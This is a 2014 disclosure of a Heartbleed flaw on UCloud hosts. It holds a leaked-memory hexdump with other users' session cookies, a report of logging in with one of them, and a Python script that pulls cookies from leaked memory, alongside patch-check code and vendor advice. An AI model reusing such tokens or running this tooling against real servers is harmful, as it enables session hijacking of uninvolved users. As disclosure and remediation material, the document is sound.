UCloud: improper operations practice allows logging in as arbitrary users and obtaining sensitive server information (login succeeded)

Vulnerability Details

Disclosure status:

2014-04-09: Details reported to the vendor; awaiting vendor handling
2014-04-09: Vendor confirmed; details visible to the vendor only
2014-04-19: Details disclosed to core white hats and domain experts
2014-04-29: Details disclosed to regular white hats
2014-05-09: Details disclosed to intern white hats
2014-05-24: Details disclosed to the public

Brief description:

UCloud's improper operations practice allows logging in as arbitrary users and obtaining sensitive server information

Detailed description:

https://uhost.ucloud.cn

https://udb.ucloud.cn

Sensitive information obtained. Below is the output of the heartbeat test against the host: after the handshake, the server answers a malformed heartbeat request with a 16384-byte heartbeat record (content type 24). The first three payload bytes, 02 40 00, are a heartbeat response claiming a 0x4000-byte payload, which the server filled from its own process memory instead of rejecting the request. Further down the dump are HTTP request fragments from other users' connections, including Cookie headers carrying tgt and PHPSESSID session tokens.

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 3187
... received message: type = 22, ver = 0302, length = 525
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90 .+..H...9.......
0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0 .w.3....f.....".
0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00 !.9.8.........5.
0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0 ................
0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00 ............3.2.
0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00 ....E.D...../...
0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00 A...............
0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01 ................
0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00 ..I...........4.
00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00 2...............
00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 ................
00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00 ................
00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 02 01 04 03 ....#...........
00e0: 05 03 02 03 04 02 02 02 00 12 00 00 03 04 02 02 ................
00f0: 02 35 EC 72 16 9E 9C 09 36 BE 3F 30 0B 7E 66 45 .5.r....6.?0.~fE
0100: 0B 1F A5 08 8F AE 95 D0 0A CF 4E 8B B5 D6 7A 56 ..........N...zV
0110: 0E 8C 3E 35 CC 0C 13 78 39 D5 E4 8A 43 9A E5 DF ..>5...x9...C...
0120: 9C 62 C5 CA 60 CF 07 51 DD C1 1A 3D 45 86 23 FE .b..`..Q...=E.#.
0130: 7C A9 56 D2 60 AE 69 23 8E A0 BB FA 8F 96 C9 C7 |.V.`.i#........
0140: 02 91 30 E5 F4 94 EF 3A 61 2A 1B 0D 46 48 2D 66 ..0....:a*..FH-f
0150: 64 E6 12 5A 1E 3A A4 A2 46 D5 B9 5F 21 46 EC FB d..Z.:..F.._!F..
0160: F6 08 DD 08 05 45 AB 32 56 3D 87 01 C6 A6 73 01 .....E.2V=....s.
0170: AE 3E A6 D1 6E 04 09 2C 00 05 00 05 01 00 00 00 .>..n..,........
0180: 00 47 42 4B 2C 75 74 66 2D 38 3B 71 3D 30 2E 37 .GBK,utf-8;q=0.7
0190: 2C 2A 3B 71 3D 30 2E 33 0D 0A 43 6F 6F 6B 69 65 ,*;q=0.3..Cookie
01a0: 3A 20 72 65 66 65 72 72 65 72 5F 75 72 6C 3D 68 : referrer_url=h
01b0: 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2E ttp%3A%2F%2Fwww.
01c0: 67 6F 6F 67 6C 65 2E 63 6F 6D 2E 68 6B 25 32 46 google.com.hk%2F
01d0: 75 72 6C 25 33 46 73 61 25 33 44 74 25 32 36 72 url%3Fsa%3Dt%26r
01e0: 63 74 25 33 44 6A 25 32 36 71 25 33 44 55 43 6C ct%3Dj%26q%3DUCl
01f0: 6F 75 64 25 32 36 73 6F 75 72 63 65 25 33 44 77 oud%26source%3Dw
0200: 65 62 25 32 36 63 64 25 33 44 31 25 32 36 76 65 eb%26cd%3D1%26ve
0210: 64 25 33 44 30 43 44 67 51 46 6A 41 41 25 32 36 d%3D0CDgQFjAA%26
0220: 75 72 6C 25 33 44 25 32 35 36 38 25 32 35 37 34 url%3D%2568%2574
0230: 25 32 35 37 34 25 32 35 37 30 25 32 35 37 33 25 %2574%2570%2573%
0240: 32 35 33 61 25 32 35 32 66 25 32 35 32 66 25 32 253a%252f%252f%2
0250: 35 37 37 25 32 35 37 37 25 32 35 37 37 25 32 35 577%2577%2577%25
0260: 32 65 25 32 35 37 35 25 32 35 36 33 25 32 35 36 2e%2575%2563%256
0270: 63 25 32 35 36 66 25 32 35 37 35 25 32 35 36 34 c%256f%2575%2564
0280: 25 32 35 32 65 25 32 35 36 33 25 32 35 36 65 25 %252e%2563%256e%
0290: 32 35 32 66 25 32 36 65 69 25 33 44 56 7A 6B 36 252f%26ei%3DVzk6
02a0: 55 38 47 48 45 75 65 59 69 41 65 51 6A 6F 44 51 U8GHEueYiAeQjoDQ
02b0: 41 51 25 32 36 75 73 67 25 33 44 41 46 51 6A 43 AQ%26usg%3DAFQjC
02c0: 4E 45 49 41 56 4F 46 4B 48 71 4B 6D 65 78 45 36 NEIAVOFKHqKmexE6
02d0: 73 46 44 56 70 53 42 50 52 74 61 46 51 25 32 36 sFDVpSBPRtaFQ%26
02e0: 62 76 6D 25 33 44 62 76 2E 36 33 39 33 34 36 33 bvm%3Dbv.6393463
02f0: 34 25 32 43 64 2E 61 47 63 25 32 36 63 61 64 25 4%2Cd.aGc%26cad%
0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31 3Drjt; tgt=TGC-1
0310: 33 39 36 33 32 34 37 32 35 72 35 42 32 36 38 46 396324725r5B268F
0320: 33 46 42 32 37 45 30 46 39 34 45 34 3B 20 50 48 3FB27E0F94E4; PH
0330: 50 53 45 53 53 49 44 3D 53 54 2D 31 33 39 36 33 PSESSID=ST-13963
0340: 33 38 33 32 33 72 31 30 46 30 31 35 31 31 34 33 38323r10F0151143
0350: 31 30 39 32 41 30 32 41 3B 20 5F 5F 75 74 6D 61 1092A02A; __utma
0360: 3D 31 31 31 33 38 39 33 33 32 2E 31 31 35 35 32 =111389332.11552
0370: 33 38 38 36 30 2E 31 33 39 36 33 33 34 31 37 38 38860.1396334178
0380: 2E 31 33 39 36 33 33 34 31 37 38 2E 31 33 39 36 .1396334178.1396
0390: 33 33 38 33 32 36 2E 32 3B 20 5F 5F 75 74 6D 63 338326.2; __utmc
03a0: 3D 31 31 31 33 38 39 33 33 32 3B 20 5F 5F 75 74 =111389332; __ut
03b0: 6D 7A 3D 31 31 31 33 38 39 33 33 32 2E 31 33 39 mz=111389332.139
03c0: 36 33 33 38 33 32 36 2E 32 2E 32 2E 75 74 6D 63 6338326.2.2.utmc
03d0: 73 72 3D 75 64 62 2E 75 63 6C 6F 75 64 2E 63 6E sr=udb.ucloud.cn
03e0: 7C 75 74 6D 63 63 6E 3D 28 72 65 66 65 72 72 61 |utmccn=(referra
03f0: 6C 29 7C 75 74 6D 63 6D 64 3D 72 65 66 65 72 72 l)|utmcmd=referr
0400: 61 6C 7C 75 74 6D 63 63 74 3D 2F 75 64 62 2F 63 al|utmcct=/udb/c
0410: 72 65 61 74 65 3B 20 48 6D 5F 6C 76 74 5F 36 31 reate; Hm_lvt_61
0420: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63
0430: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1
0440: 33 39 36 30 38 37 36 34 36 2C 31 33 39 36 33 32 396087646,139632
0450: 34 37 30 36 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 4706; Hm_lpvt_61
0460: 37 65 33 36 65 39 63 33 35 65 65 32 61 62 36 33 7e36e9c35ee2ab63
0470: 63 66 39 30 62 34 66 64 32 61 33 64 33 64 3D 31 cf90b4fd2a3d3d=1
0480: 33 39 36 33 33 39 32 35 35 0D 0A 0D 0A 5E 8B B7 396339255....^..
0490: 90 FA 5A 1A 12 16 BE 41 D1 6B 55 2F 8E B6 5E 45 ..Z....A.kU/..^E
04a0: EE 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E 0E ................
04b0: E6 06 0F 6F 2E 3C 87 CC 64 4D 64 DE F8 07 8A 0C ...o.<..dMd.....
04c0: A4 A6 68 A3 B9 6A 84 4E A9 F4 AD 69 20 86 44 58 ..h..j.N...i .DX
04d0: 46 D9 57 E1 E3 1B 1E 70 0B F6 EE 32 F2 C4 5E D1 F.W....p...2..^.
04e0: 6A 7C 2B 5A 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B j|+Z............
04f0: 94 56 04 9F A6 9A 4B 45 8E E9 2B 75 74 74 90 D6 .V....KE..+utt..
0500: 31 CD C8 BC 84 60 BD 1D 96 69 11 9E 67 88 F0 F9 1....`...i..g...
0510: 55 8E FC 23 CF 36 49 3E 26 AD E4 FE A5 35 E4 42 U..#.6I>&....5.B
0520: A1 49 D7 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C 0C .I..............
0530: 17 03 01 00 20 75 6D 48 7F AD 01 FF CC FE 26 22 .... umH......&"
0540: 03 15 84 0A 45 4E 86 FA 66 B3 0A 0A 0A 0A 0A 0A ....EN..f.......
0550: 0A 0A 0A 0A 0A 17 03 01 00 90 8B C7 80 27 82 B4 .............'..
0560: E9 AC 0D 66 40 11 53 1B 09 62 09 0E 8E 0C 0F C0 ...f@.S..b......
0570: 3F BE 2A 64 13 88 24 36 90 0C 7E CB 16 1C 41 FF ?.*d..$6..~...A.
0580: 72 9B BB 20 F4 B1 18 03 E7 1A 09 7A F3 FF 95 8E r.. .......z....
0590: 73 17 B7 9D C8 34 E9 A1 CD F2 EF 2F 5C BE E0 3C s....4...../\..<
05a0: 51 54 48 84 10 62 E3 7D 34 5F 00 E7 26 1A 2C CB QTH..b.}4_..&.,.
05b0: F8 74 B8 D6 A0 8F 68 7A A4 ED C4 D5 F5 4C 42 3D .t....hz.....LB=
05c0: 0B DE D0 F4 43 8F 5F 4D 93 05 10 50 8C 50 A9 72 ....C._M...P.P.r
05d0: E2 67 59 BC 06 F0 6A CC 7F C0 AC 45 89 44 07 7F .gY...j....E.D..
05e0: 83 F9 99 70 9A C4 B1 55 3D 95 8F 5F 4D 93 05 10 ...p...U=.._M...
05f0: 50 8C 50 A9 72 E2 67 59 BC 06 F0 6A CC 7F C0 AC P.P.r.gY...j....
0600: 45 89 44 07 7F 83 F9 99 70 9A C4 B1 55 3D 95 65 E.D.....p...U=.e
0610: 39 63 33 35 65 65 32 61 62 36 33 63 66 39 30 62 9c35ee2ab63cf90b
0620: 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 39 34 4fd2a3d3d=139694
0630: 34 35 30 36 0D 0A 49 66 2D 4D 6F 64 69 66 69 65 4506..If-Modifie
0640: 64 2D 53 69 6E 63 65 3A 20 54 68 75 2C 20 31 39 d-Since: Thu, 19
0650: 20 44 65 63 20 32 30 31 33 20 30 34 3A 35 39 3A Dec 2013 04:59:
0660: 31 35 20 47 4D 54 0D 0A 0D 0A CC 16 AB 46 AE D2 15 GMT.......F..
0670: DE C6 52 94 19 C5 50 23 93 E4 01 FF E9 1C C5 BE ..R...P#........
0680: 64 23 EB A9 1F 37 D1 0A 68 F9 12 24 74 68 69 6E d#...7..h..$thin
0690: 6B 70 68 70 2E 63 6E 25 32 36 64 74 64 25 33 44 kphp.cn%26dtd%3D
06a0: 31 38 3B 20 48 6D 5F 6C 76 74 5F 36 31 37 65 33 18; Hm_lvt_617e3
06b0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9
06c0: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396
06d0: 39 34 32 30 34 34 2C 31 33 39 36 39 34 32 39 30 942044,139694290
06e0: 34 3B 20 48 6D 5F 6C 70 76 74 5F 36 31 37 65 33 4; Hm_lpvt_617e3
06f0: 36 65 39 63 33 35 65 65 32 61 62 36 33 63 66 39 6e9c35ee2ab63cf9
0700: 30 62 34 66 64 32 61 33 64 33 64 3D 31 33 39 36 0b4fd2a3d3d=1396
0710: 39 34 32 39 31 31 0D 0A 49 66 2D 4D 6F 64 69 66 942911..If-Modif
0720: 69 65 64 2D 53 69 6E 63 65 3A 20 54 75 65 2C 20 ied-Since: Tue,
0730: 32 34 20 44 65 63 20 32 30 31 33 20 30 37 3A 34 24 Dec 2013 07:4
0740: 34 3A 31 38 20 47 4D 54 0D 0A 0D 0A E4 30 B1 B7 4:18 GMT.....0..
0750: 3D F8 B0 BE 6C B6 61 41 E7 03 DE AF 34 30 6C 64 =...l.aA....40ld
0760: 33 30 6C 76 32 33 2D 2D 73 74 31 35 73 61 31 32 30lv23--st15sa12
0770: 6C 74 32 30 6C 64 31 36 6C 76 31 36 2D 73 74 31 lt20ld16lv16-st1
0780: 32 73 61 31 30 2D 73 74 31 32 73 61 31 30 25 32 2sa10-st12sa10%2
0790: 36 72 75 72 6C 25 33 44 68 74 74 70 25 32 35 33 6rurl%3Dhttp%253
07a0: 41 25 32 35 32 46 25 32 35 32 46 77 77 33 38 2E A%252F%252Fww38.
07b0: 6C 69 6E 75 78 66 61 62 2E 63 78 25 32 35 32 46 linuxfab.cx%252F
07c0: 25 32 36 72 65 66 25 33 44 68 74 74 70 25 32 35 %26ref%3Dhttp%25
07d0: 33 41 25 32 35 32 46 25 32 35 32 46 77 77 77 2E 3A%252F%252Fwww.
07e0: 73 74 75 64 79 2D 61 72 65 61 2E 6F 72 67 25 32 study-area.org%2
07f0: 35 32 46 6C 69 6E 6B 2E 68 74 6D 0D 0A 0D 0A 5D 52Flink.htm....]
0800: 11 C6 69 CF 01 65 1F B3 5D 31 CA 9E 61 9C D3 2E ..i..e..]1..a...
0810: 75 74 6D 63 73 72 3D 28 64 69 72 65 63 74 29 7C utmcsr=(direct)|
0820: 75 74 6D 63 63 6E 3D 28 64 69 72 65 63 74 29 7C utmccn=(direct)|
0830: 75 74 6D 63 6D 64 3D 28 6E 6F 6E 65 29 0D 0A 0D utmcmd=(none)...
0840: 0A 0C E2 A8 8B 73 71 FE 0D 53 41 81 DC BE 61 3D .....sq..SA...a=
0850: FA 46 43 32 32 35 39 0D 0A 0D 0A FD 2C 93 BB C8 .FC2259.....,...
0860: 4A 58 D6 25 CC 83 48 67 FE 37 C9 FE 2E D6 0C B2 JX.%..Hg.7......
0870: DE 4D 85 23 37 04 6B 5A 0C 0C 0C 0C 0C 0C 0C 0C .M.#7.kZ........
0880: 0C 0C 0C 0C 0C DD 2B BC 8B CE FE FE 6D EE 75 A7 ......+.....m.u.
0890: 2B 92 E8 7A 94 B8 63 AF 87 B4 74 3D 2F 0D 0A 0D +..z..c...t=/...
08a0: 0A 95 A9 40 DA B2 55 E0 62 72 AF AA AC AB 66 06 ...@..U.br....f.
08b0: 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f...............
08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
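To turn a dump like the one above into something a responder can act on, here is an added Python example written for this page; it is not the original test script and not UCloud's code. It reads the hexdump format exactly as printed above, checks the three-byte heartbeat header (type 0x02 = heartbeat_response, claimed length 0x4000), and pulls cookie values out of the leaked memory, the same tgt and PHPSESSID tokens the report reused to log in. The embedded sample is an excerpt of this page's own dump (the first line plus offsets 0x300-0x350, with the lines in between omitted); the list of session cookie names and all function names are my own choices.

```python
import re
from typing import Dict, List, Optional, Tuple

# One line of the hexdump as printed on the page:
# "0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31 3Drjt; tgt=TGC-1"
# At most 16 byte pairs are taken, so an ASCII column that happens to start
# with hex-looking characters ("3Drjt") is not misread as a 17th byte.
HEX_LINE = re.compile(r"^\s*[0-9a-fA-F]{4}:((?:\s[0-9a-fA-F]{2}){1,16})")

# Excerpt of the dump on this page: the first 16 bytes, then offsets 0x300-0x350.
# Offsets 0x010-0x2f0 are omitted here, so the parser just concatenates bytes in order.
SAMPLE_DUMP = """\
0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C .@....SC[...r...
0300: 33 44 72 6A 74 3B 20 74 67 74 3D 54 47 43 2D 31 3Drjt; tgt=TGC-1
0310: 33 39 36 33 32 34 37 32 35 72 35 42 32 36 38 46 396324725r5B268F
0320: 33 46 42 32 37 45 30 46 39 34 45 34 3B 20 50 48 3FB27E0F94E4; PH
0330: 50 53 45 53 53 49 44 3D 53 54 2D 31 33 39 36 33 PSESSID=ST-13963
0340: 33 38 33 32 33 72 31 30 46 30 31 35 31 31 34 33 38323r10F0151143
0350: 31 30 39 32 41 30 32 41 3B 20 5F 5F 75 74 6D 61 1092A02A; __utma
"""

HEARTBEAT_RESPONSE = 2          # HeartbeatMessageType.heartbeat_response (RFC 6520)
REQUESTED_PAYLOAD_LEN = 0x4000  # payload_length the test script claimed in its request


def parse_hexdump(text: str) -> bytes:
    """Turn the printed hexdump back into the raw heartbeat record payload."""
    out = bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex("".join(m.group(1).split()))
    return bytes(out)


def heartbeat_header(payload: bytes) -> Optional[Tuple[int, int]]:
    """(type, claimed payload_length) from the 3-byte HeartbeatMessage header."""
    if len(payload) < 3:
        return None
    return payload[0], int.from_bytes(payload[1:3], "big")


def echoes_unchecked_length(payload: bytes, requested: int = REQUESTED_PAYLOAD_LEN) -> bool:
    """A patched server discards a heartbeat whose payload_length exceeds the record;
    a vulnerable one echoes the claimed length back and fills it from memory."""
    hdr = heartbeat_header(payload)
    return hdr is not None and hdr[0] == HEARTBEAT_RESPONSE and hdr[1] == requested


# Session cookie names to look for even when the "Cookie:" header itself fell
# outside the leaked region (the excerpt above starts mid-request). Assumed list.
SESSION_COOKIE_NAMES = ("PHPSESSID", "tgt", "JSESSIONID", "sessionid")
COOKIE_HEADER = re.compile(rb"Cookie:\s*([^\r\n]+)", re.IGNORECASE)
COOKIE_PAIR = re.compile(rb"(?:^|;\s*)([A-Za-z0-9_\-]+)=([^;\r\n]*)")


def extract_cookies(data: bytes) -> Dict[str, List[str]]:
    """Collect cookie name -> distinct values seen anywhere in the leaked memory."""
    found: Dict[str, List[str]] = {}

    def add(name: bytes, value: bytes) -> None:
        vals = found.setdefault(name.decode("ascii", "replace"), [])
        v = value.decode("ascii", "replace")
        if v not in vals:
            vals.append(v)

    for m in COOKIE_HEADER.finditer(data):          # complete Cookie: headers
        for name, value in COOKIE_PAIR.findall(m.group(1)):
            add(name, value)
    for name in SESSION_COOKIE_NAMES:               # orphaned name=value fragments
        pat = rb"(?<![A-Za-z0-9_])" + name.encode() + rb"=([^;\s]+)"
        for m in re.finditer(pat, data):
            add(name.encode(), m.group(1))
    return found


def printable_runs(data: bytes, min_len: int = 8) -> List[str]:
    """ASCII runs long enough to be headers, URLs or tokens (what `strings` would show)."""
    pat = rb"[\x20-\x7e\r\n\t]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pat, data)]


if __name__ == "__main__":
    payload = parse_hexdump(SAMPLE_DUMP)
    print("heartbeat header:", heartbeat_header(payload))
    print("vulnerable-looking response:", echoes_unchecked_length(payload))
    for name, values in extract_cookies(payload).items():
        print(f"{name} = {values}")
```

Run against the full dump, `extract_cookies` also recovers the `Hm_lvt_*`/`__utm*` analytics cookies and the `referrer_url` value, which identify the victim's browsing session but are not what grants login; `tgt` (the SSO ticket) and `PHPSESSID` are. Anything this returns from a production host should be treated as compromised and revoked.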

Proof of vulnerability:

Logged in successfully with the leaked cookie; further attacks can be carried out from there

1.png

Fix:

Upgrade OpenSSL to a release with the heartbeat fix, restart every service that loads it, and invalidate the sessions whose cookies were exposed

Copyright notice: when reposting, please credit the source: 海绵宝宝@乌云


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2014-04-09 15:25

Vendor reply:

Thank you for your support of UCLOUD. One more thing worth mentioning: when updating OpenSSL, some dependent programs need attention. If they are dynamically linked, the service must be restarted; if statically linked, the service must be recompiled, for example Nginx.
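The fix above (upgrade OpenSSL) and the vendor's caveat about dynamically versus statically linked services come down to one post-upgrade check: which processes still have the old libssl/libcrypto mapped, and which binaries were built against a vulnerable OpenSSL. The Python below is an added example for this page, not UCloud's or the reporter's code. It reads `/proc/<pid>/maps`, where a process that still holds a replaced library shows the path with a `(deleted)` suffix, and scans a binary for the embedded `OpenSSL x.y.z` version string. The maps text and version strings in it are constructed samples; the vulnerable range (1.0.1 through 1.0.1f, and 1.0.2-beta1) is the upstream one.

```python
import os
import re
from typing import List, Tuple

# /proc/<pid>/maps row: address perms offset dev inode pathname
# After the package upgrade, a process still holding the OLD library shows the
# path with a "(deleted)" suffix, because the file it mapped has been replaced.
SSL_LIB = re.compile(r"/lib(?:ssl|crypto)[^\s]*\.so")

# Constructed sample: one process that still maps the pre-upgrade libssl/libcrypto.
SAMPLE_MAPS = (
    "7f3a0000-7f3a1000 r-xp 00000000 08:01 1234 /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (deleted)\n"
    "7f3a1000-7f3a2000 r-xp 00000000 08:01 1235 /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0 (deleted)\n"
    "7f3a2000-7f3a3000 r-xp 00000000 08:01 1236 /lib/x86_64-linux-gnu/libc-2.13.so\n"
    "7f3a3000-7f3a4000 rw-p 00000000 00:00 0\n"
)


def stale_ssl_mappings(maps_text: str) -> List[str]:
    """Old libssl/libcrypto images still mapped into a process (sorted, de-duplicated)."""
    stale = set()
    for line in maps_text.splitlines():
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # anonymous mapping, no pathname
        path = parts[5]
        if SSL_LIB.search(path) and path.endswith("(deleted)"):
            stale.add(path)
    return sorted(stale)


def processes_needing_restart() -> List[Tuple[int, str]]:
    """Walk /proc on the local host (root is needed to read other users' maps)."""
    hits: List[Tuple[int, str]] = []
    if not os.path.isdir("/proc"):
        return hits
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{pid}/maps") as f:
                maps = f.read()
        except OSError:
            continue  # process exited or permission denied
        hits.extend((int(pid), p) for p in stale_ssl_mappings(maps))
    return hits


# A statically linked server (the vendor's Nginx case) maps no libssl at all, so the
# check above cannot see it. The OpenSSL version it was built against is still
# embedded as a string, e.g. "OpenSSL 1.0.1e 11 Feb 2013". Caveat: a dynamically
# linked nginx carries the same string from its build headers ("nginx -V" prints it),
# so for those the maps check, not this string, tells you what is actually running.
VERSION_STRING = re.compile(rb"OpenSSL (\d+\.\d+\.\d+[a-z]?(?:-beta\d+)?)")


def embedded_openssl_versions(binary: bytes) -> List[str]:
    return sorted({m.group(1).decode() for m in VERSION_STRING.finditer(binary)})


def is_heartbleed_version(version: str) -> bool:
    """Upstream releases with the heartbeat bug: 1.0.1 through 1.0.1f, and 1.0.2-beta1.
    Distributions backport fixes without bumping the string (a patched 1.0.1e exists),
    so treat a hit as "verify with the package changelog", not as proof."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)(?:-beta(\d+))?", version)
    if not m:
        return False
    major, minor, patch, letter, beta = m.groups()
    if (major, minor, patch) == ("1", "0", "1"):
        return letter == "" or letter <= "f"   # 1.0.1g shipped the fix
    if (major, minor, patch) == ("1", "0", "2"):
        return beta == "1"                      # only 1.0.2-beta1 was affected
    return False


if __name__ == "__main__":
    print("sample:", stale_ssl_mappings(SAMPLE_MAPS))
    for pid, path in processes_needing_restart():
        print(f"pid {pid} still maps {path}: restart it")
    for binary in ("/usr/sbin/nginx", "/usr/local/nginx/sbin/nginx"):  # assumed paths
        try:
            with open(binary, "rb") as f:
                data = f.read()
        except OSError:
            continue
        for v in embedded_openssl_versions(data):
            flag = " (heartbeat bug range: rebuild)" if is_heartbleed_version(v) else ""
            print(f"{binary}: built against OpenSSL {v}{flag}")
```

A process listed by `processes_needing_restart` is the vendor's dynamically linked case and only needs a restart; a statically linked build flagged by `is_heartbleed_version` must be rebuilt against the fixed OpenSSL, since nothing on disk that it loads at runtime changed.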

Latest status:

None


Vulnerability rating: